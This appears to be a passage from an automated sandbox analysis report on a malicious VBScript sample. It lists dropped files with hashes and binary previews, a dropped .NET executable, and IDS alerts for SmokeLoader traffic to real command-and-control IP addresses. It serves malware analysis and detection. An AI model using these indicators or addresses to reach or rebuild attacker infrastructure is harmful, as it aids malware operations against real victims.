                                                                                                                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):64
                                                                                                                                                    Entropy (8bit):1.1628158735648508
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:Nlllul5mxllp:NllU4x/
                                                                                                                                                    MD5:3A925CB766CE4286E251C26E90B55CE8
                                                                                                                                                    SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                                                                                                                                    SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                                                                                                                                    SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:@...e................................................@..........

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1FA.tmp

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):40960
                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\2D5.tmp

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):20480
                                                                                                                                                    Entropy (8bit):0.848598812124929
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                                                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                                                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                                                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                                                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\344.tmp

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):106496
                                                                                                                                                    Entropy (8bit):1.137181696973627
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\400.tmp

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):51200
                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4AD.tmp

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):20480
                                                                                                                                                    Entropy (8bit):0.6732424250451717
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\53B.tmp

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                    Category:modified
                                                                                                                                                    Size (bytes):196608
                                                                                                                                                    Entropy (8bit):1.1215420383712111
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\BF.tmp

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):32768
                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\FE0F.tmp

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):98304
                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\FE0F.tmp-shm

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):32768
                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5d5mz2kh.02x.ps1

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):60
                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_exmah5s5.juw.psm1

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):60
                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                    C:\Users\user\AppData\Roaming\ahfhegc

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):339146
                                                                                                                                                    Entropy (8bit):7.999446943099343
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:6144:ACoRnYvPWWHkAqO+OXu0j4XQYrHI4UbwS5M3Y3g4ILFeTkRWWgEXzVyMQBUJtQCx:ACE0c3O1YrSF5MIQUkR5djVyMQWrQC9/
                                                                                                                                                    MD5:D43B0AE2DD3CD06BC4D281F54AD1F0D8
                                                                                                                                                    SHA1:D06DE8C7C709CDD484D1DCADC6CBD8229A0BCBBA
                                                                                                                                                    SHA-256:21D89097E940DC5C8B94178757EC08763C44BB14A6D9B43A84A7C06CC0DCC76E
                                                                                                                                                    SHA-512:70B295DB1A036EC6E424AE3ADF5F4AF8021A1C0B33ED5CE42C94916E53D7BCB22C3C6C660D7603EC75BFAFC5D20D4360AB5864584EC0304007D49BFFF02D4D9F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:9@m..9..6..L.O..M3.vm..vf.3\..50.I.2.h.%......d6J+?4....m.\......Q.0.....\`.mg.....Z~4.HT..W/..M.I~.....0..0...9[.f.......R...?..J..;bGk]...f.u.j<..%[3.4..e.#1.(...7.3 ...5./.6=..^{SP...h.J..uc...L.S.K..MJ ...P...|...?...B.>R..-(.....E.T.tP\~!.y.#g8..N.iD..:K;J.|.[...X....E,.k.+.."u.O.Gr..%K.*x.r.;...lV.......Z.[E......YKU...:\......].?.p........eq...E....|.u.N.Du..5.n.72.5wiO.....bgL4.'.9...#..t...]v.. ...57......L.FwR.....~./PX...FN ej.4r.I.Z.H2.$kR..=j.....M.W.H.%.I..bv)......r.xE.....G}..[.?.Oc!../W:.....3.>5:..jX.{d...U}...>l....X..#p.lK...>...n*...<i..g&....'U3..L.fI..XS..]^f...|V.... <+..:..c..en.1..J....M'.....xk......'Z.v......l.......=>1.w3...G..-n!...3|.l....(o}.YWW-..7f.5......xP...J.g.....%...$*(1r.....A...9A...+K{$..L...D..`5..-Q..2h.%*$Y....{..!..B\....T.D-W...4...<2.V4.n....N...[..+.6. ....V).!p....w."`.:.%.s..:..,.!.R6_z%...........o.K....5x....-"....w5\.*R."...N..H3...E}..|s]...Mn.Wm....%..Rh./.;..#...q.#.8......$..

                                                                                                                                                    C:\Users\user\AppData\Roaming\uahuajd

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):56368
                                                                                                                                                    Entropy (8bit):6.120994357619221
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:fF9E8FLLs2Zokf85d9PTV6Iq8Fnqf7P+WxqWKnz8DH:ffE6EkfOd9PT86dWvKgb
                                                                                                                                                    MD5:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                    SHA1:19DFD86294C4A525BA21C6AF77681B2A9BBECB55
                                                                                                                                                    SHA-256:99A2C778C9A6486639D0AFF1A7D2D494C2B0DC4C7913EBCB7BFEA50A2F1D0B09
                                                                                                                                                    SHA-512:94F0ACE37CAE77BE9935CF4FC8AAA94691343D3B38DE5E16C663B902C220BFF513CD02256C7AF2D815A23DD30439582DDBB0880009C76BBF36FF8FBC1A6DDC18
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                    • Filename: begoodforeverythinggreatthingsformebetterforgood.hta, Detection: malicious, Browse
                                                                                                                                                    • Filename: bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta, Detection: malicious, Browse
                                                                                                                                                    • Filename: kissmegoodthingwhichgivemebestthignswithgirluaremy.hta, Detection: malicious, Browse
                                                                                                                                                    • Filename: bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta, Detection: malicious, Browse
                                                                                                                                                    • Filename: invoice727282_PDF..exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs, Detection: malicious, Browse
                                                                                                                                                    • Filename: 6038732).vbs, Detection: malicious, Browse
                                                                                                                                                    • Filename: cirby0J3LP.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A>.]..............0................. ........@.. ....................................`.................................t...O.......................0B..........<................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......t3..pc.............X...<........................................0..........s.....Y.....(.....Z.....&..(......+....(....o......r...p(....-..r...p(....,.....X....i2..-;(....(..........%.r!..p.(....(....((...(....(....(....( .....-.(7...(.....*.(....-..*.~S...-.~R....S...s!.....~W...o"....~U...o#....~V...o$....o%...~Y...o&...~S...~Q...~T....s'....P...~P...sE...o(............~W....@_,s.....()...r7..p.$(*........o+..........o,....2....... ....37(....(8.........%...o-....

                                                                                                                                                    \Device\ConDrv

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\uahuajd
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):221
                                                                                                                                                    Entropy (8bit):4.801526423190794
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:zx3Me21f1LRJIQtAMw/VgRZBXVN+1GFJqozrCib:zKpj1JIUwqBFN+1Q3b
                                                                                                                                                    MD5:A3DCA41A950A7DF7ECE76A867A17400E
                                                                                                                                                    SHA1:AA9EFDBCF37BEE2C7FD0986F1A4308A73EC3F7BB
                                                                                                                                                    SHA-256:6B2BE177016DF867316A0C432DAB0B71B6E51B35D169B0ACB1ABB47A4C03D7C0
                                                                                                                                                    SHA-512:F80207B5B78C7AE867AAB139196BBBEDE0437961DD03E790AEF3B877A228D7A90B9178B3342324B0EEA1C270E2A232A769B2F2D9E5DB4C065EB95140FA12239D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:Microsoft (R) ASP.NET Compilation Tool version 4.8.4084.0..Utility to precompile an ASP.NET application..Copyright (C) Microsoft Corporation. All rights reserved.....Run 'aspnet_compiler -?' for a list of valid options...

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Unicode text, UTF-8 text, with very long lines (12085), with CRLF line terminators
                                                                                                                                                    Entropy (8bit):5.3949239509459925
                                                                                                                                                    TrID:
                                                                                                                                                    • Visual Basic Script (13500/0) 100.00%
                                                                                                                                                    File name:sweetnessgoodforgreatnessthingswithgood.tIF.vbs
                                                                                                                                                    File size:224'763 bytes
                                                                                                                                                    MD5:8ccd875893cd23b67d7c61ea735f5c52
                                                                                                                                                    SHA1:6171c7dd4f67a67fff0ca151c7e9a06104e00def
                                                                                                                                                    SHA256:16328212055d6aa79c45b6624607f74b732b159db4c6cdf7d8e6835ebdc6e392
                                                                                                                                                    SHA512:3ceb06944fb1cb3f176e9163f761e3c2d97e72a9e0177f417d4a83e03f4b539fbcb2d7ebe53865a483cacdc8eaf16ce292245aed1cc60c207f7ca038ced07f31
                                                                                                                                                    SSDEEP:3072:A8gVmI3b0mgfmWu+ke9VOv5iG5sVhQ30Wk+70wgA1A:A8gVxe9VOvM
                                                                                                                                                    TLSH:9C2402311C8A82326E1E58095820F110DA8DE47368BFD4D177BEDFE95B122D588AFF67
                                                                                                                                                    File Content Preview:Dim sh 'WScript.Shell object..Dim fso 'Scripting.FileSystemObject..Dim format 'StringFormatter object..Dim suiteFolder 'string: folder where test suite scripts are located..Dim projectFolder 'string: root folder for this project..Dim suiteFilter 'string:

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:68d69b8f86ab9a86

                                                                                                                                                    Network Behavior

                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                    2025-01-09T08:02:45.418836+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.74991346.173.214.1480TCP
                                                                                                                                                    2025-01-09T08:02:45.689594+01002829848ETPRO MALWARE SmokeLoader encrypted module (3)246.173.214.1480192.168.2.749913TCP
                                                                                                                                                    2025-01-09T08:02:50.795369+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.74994246.173.214.1480TCP
                                                                                                                                                    2025-01-09T08:04:02.534429+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.74998746.173.214.1480TCP
                                                                                                                                                    2025-01-09T08:04:04.159872+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.74998846.173.214.1480TCP

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jan 9, 2025 08:02:19.607248068 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:19.612226009 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:19.612294912 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:19.612373114 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:19.617074013 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.096890926 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.096911907 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.096937895 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.096966982 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.097006083 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.097018957 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.097043037 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.097179890 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.097193956 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.097206116 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.097218037 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.097251892 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.097305059 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.097317934 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.097362995 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.101871967 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.101885080 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.101898909 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.101916075 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.101932049 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.101959944 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.201577902 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.201606989 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.201630116 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.201652050 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.201716900 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.201729059 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.201740026 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.201754093 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.201788902 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.202002048 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.202013016 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.202024937 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.202049017 CET4976380192.168.2.7192.3.27.144
                                                                                                                                                    Jan 9, 2025 08:02:20.202085972 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.202097893 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.202107906 CET8049763192.3.27.144192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:20.202122927 CET4976380192.168.2.7192.3.27.144
